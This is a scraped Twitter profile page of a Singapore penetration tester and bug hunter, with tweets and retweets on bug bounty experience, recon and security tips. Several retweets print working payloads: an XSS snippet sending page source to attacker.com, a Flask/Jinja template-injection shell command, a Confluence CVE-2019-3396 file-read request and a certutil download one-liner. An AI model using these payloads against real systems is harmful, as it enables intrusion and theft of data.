WenBin Kong

@kongwenbin

Penetration Tester | Bug Hunter. Blog: Learning never stops! My tweets are my own and has nothing to do with my employer.

Singapore
linkedin.com/in/kongwenbin
Vrijeme pridruživanja: svibanj 2016.
27 fotografija ili videozapisa Fotografije i videozapisi

Tweetovi

Blokirali ste korisnika/cu @kongwenbin

Jeste li sigurni da želite vidjeti te tweetove? Time nećete deblokirati korisnika/cu @kongwenbin

  1. Prikvačeni tweet
    31. pro 2018.

    I posted a review of my bug hunting journey so far, from when I just started, to the point where I made it into the Top 200 bug hunters on recently, after two years on the platform: URL: Happy New Year!

    11 proslijeđenih tweetova 46 korisnika označava da im se sviđa
    Poništi
  2. 9. sij

    Everyone is a genius. But if you judge a fish by its ability to climb a tree, it will live its whole life believing that it is stupid.

    1 korisnik označava da mu se sviđa
    Poništi
  3. proslijedio/la je Tweet
    10. lis 2019.
    Odgovor korisniku/ci

    XSS isn't about alert(1). The payload below steals source code of the current webpage without triggering browser restrictions <svg/onload="(new Image()).src='//attacker.com/'%2Bdocument.documentElement.innerHTML">

    5 replies 30 proslijeđenih tweetova 113 korisnika označava da im se sviđa
    Poništi
  4. proslijedio/la je Tweet
    9. lis 2019.

    One liner to import whole list of subdomains into Burp suite for automated scanning! cat <file-name> | parallel -j 200 curl -L -o /dev/null {} -x 127.0.0.1:8080 -k -s

    1 reply 124 proslijeđena tweeta 294 korisnika označavaju da im se sviđa
    Poništi
  5. proslijedio/la je Tweet
    2. lis 2019.

    Want more training apps? We hear you! We just released the MSTG-Android-Java & MSTG-Android-Kotlin for Android and the MSTG-JWT app for iOS. Come and check it out at ! With special thanks to , , , and !

    20 proslijeđenih tweetova 29 korisnika označava da im se sviđa
    Poništi
  6. 19. ruj 2019.

    Many people in Singapore has received this message via sms : ``` Your courier has been sent out. Please check and accept it. ``` Hopefully people don't fall for it. It would even download a fake DHL APK file when you open the url 😑

    Poništi
  7. 6. srp 2019.

    This is brilliant! I could only last 30 seconds. I think it can make most people piss off though, not just designers.

    How to piss off every designer ever.
    Prikaži ovu nit
    Poništi
  8. 31. svi 2019.

    Keep trying... 😑 somehow this was classified as an important email by Outlook and hence managed to get into the "Focused" section of my email inbox.

    1 reply 1 korisnik označava da mu se sviđa
    Poništi
  9. proslijedio/la je Tweet
    15. tra 2019.

    Cobalt Strike. Walkthrough for Red Teamers

    72 proslijeđena tweeta 191 korisnik označava da mu se sviđa
    Poništi
  10. proslijedio/la je Tweet
    15. tra 2019.

    I added about 300k more dirs/files to 's content_discovery_all.txt. Enjoy!

    7 replies 198 proslijeđenih tweetova 517 korisnika označava da im se sviđa
    Poništi
  11. proslijedio/la je Tweet
    15. tra 2019.

    CVE-2019-3396 POC (h/t to ) POST /rest/tinymce/1/macro/preview HTTP/1.1 Host: {"contentId":"1245","macro":{"name":"widget","body":"","params":{"url":"…","width":"300","height":"200","_template":"file:///"}}}

    41 proslijeđeni tweet 175 korisnika označava da im se sviđa
    Poništi
  12. proslijedio/la je Tweet
    9. tra 2019.

    Common ways to get RCE: - SSRF to Metadata - Jenkins /script - Jenkins Orange RCE - Leaked cloud creds/keys (online, via LFD, ect) - Arbitrary file upload - ImageTragik - SSTI Fill in how you've gotten RCE!

    59 replies 458 proslijeđenih tweetova 1.087 korisnika označava da im se sviđa
    Prikaži ovu nit
    Prikaži ovu nit
    Poništi
  13. proslijedio/la je Tweet
    8. tra 2019.

    Remember, hunting on bug bounty programs isn’t a walk in, get cash, easy task. in most cases it’s some of the most hardened targets that you’re ever going to go up against. That requires a lot of thinking outside the box, coz the bugs&$ are there, but you will have to work for it

    14 replies 44 proslijeđena tweeta 244 korisnika označavaju da im se sviđa
    Poništi
  14. 30. ožu 2019.

    H1-65 was a huge blast! Honoured to meet some of the most amazing and talented bug hunters from around the world! Finally managed to map some of the Twitter handles to faces in real life 😂 Thanks & for making this happen!

    1 proslijeđeni tweet 38 korisnika označava da im se sviđa
    Poništi
  15. proslijedio/la je Tweet
    28. ožu 2019.

    Wow, this is a great payload for sites using Flask/Jinja: {{config.items()[4][1].__class__.__mro__[2].__subclasses__()[229]([\"touch /tmp/test\"], shell=True) }} Simple pythonic ! Easiest Server-Side Template Injection.

    206 proslijeđenih tweetova 482 korisnika označavaju da im se sviđa
    Poništi
  16. 27. ožu 2019.

    Totally looking forward to meeting the super talented folks from all over the world tomorrow at ☺️

    5 korisnika označava da im se sviđa
    Poništi
  17. proslijedio/la je Tweet
    26. ožu 2019.

    Only recently learned that you can use certutil to download files. certutil -urlcache -split -f http://file.txt c:\somewhere\file.txt Thanks for the tip.

    13 replies 83 proslijeđena tweeta 269 korisnika označava da im se sviđa
    Poništi
  18. 27. ožu 2019.

    Great thread on recon, thanks for getting this started. Looking forward to the video!

    Bounty/pentest community, I’m working on ideas for a video that’s all about recon, and to get it right I need your help. What’s your 3 best recon tips and tools for beginners to intermediate
    Prikaži ovu nit
    1 korisnik označava da mu se sviđa
    Poništi
  19. 21. ožu 2019.

    This is so important, everyone in should read this. - read this too!

    InfoSec is such a fast paced profession that can be a time eater if you let it. Don’t feel bad for sacrificing some knowledge for personal physical and mental health. Spend time with friends. Play video games. Go to the gym. Learn a new hobby. The world will keep spinning :-)
    2 proslijeđena tweeta 1 korisnik označava da mu se sviđa
    Poništi
  20. proslijedio/la je Tweet
    17. ožu 2019.

    Maybe it’s not obvious, so I’ll repeat it. Hackers and the community in general are here to help people and companies to fix their security issues. We are the nice guys in this story, we are helping people in the good way.

    35 replies 149 proslijeđenih tweetova 1.019 korisnika označava da im se sviđa
    Prikaži ovu nit
    Prikaži ovu nit
    Poništi
  21. proslijedio/la je Tweet
    14. ožu 2019.

    Sometimes user input is reflected into a value without any quotations. Eg:<input value={input}> Just add a space and you can now inject onfocus=alert(0) autofocus for XSS! Works even against htmlspecialchars().

    48 proslijeđenih tweetova 131 korisnik označava da mu se sviđa
    Poništi

@kongwenbin još nije objavio nijedan Tweet.

Čini se da učitavanje traje već neko vrijeme.

Twitter je možda preopterećen ili ima kratkotrajnih poteškoća u radu. Pokušajte ponovno ili potražite dodatne informacije u odjeljku Status Twittera.

    Možda bi vam se svidjelo i ovo:

    ·